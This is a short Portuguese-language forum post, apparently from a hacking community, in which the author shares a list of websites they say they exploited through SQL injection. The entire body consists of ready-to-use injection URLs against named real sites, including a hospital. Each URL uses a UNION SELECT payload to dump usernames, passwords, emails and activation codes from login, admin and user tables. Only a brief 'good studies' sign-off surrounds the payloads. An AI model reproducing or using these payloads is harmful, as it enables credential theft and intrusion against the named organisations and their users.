Tweet
Bom Galerinha do GH estou compartilhando uma pequena lista de Sites que eu explorei
usando de base a falha SQL Injection
Código:
http://www.excelenciaeventos.net.br/galeria2.php?id=-1 union select 1,2,3,4,group_concat(cp_user,0x3d,cp_pass) from tb_login http://www.culturecrossing.net/basics_business_student.php?id=-27 union all select 1,group_concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14 from phpbb_users-- https://www.stanthonyhospital.org/index.php?option=com_education_classes&task=showEvents&id=11 /**/AND/**/1=2/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,email,0x3a,password,0x3a,activation,0x3c62723e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/jos_users-- http://www.irwinhunter.com.au/products.php?prodid=-45 union select 1,2,group_concat(login,0x3a,password),4,5,6,7 from admin http://www.e-maximfashion.com/news.php?news_id=-2 union select 1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10 from admin--
Bons Estudos ~
Comment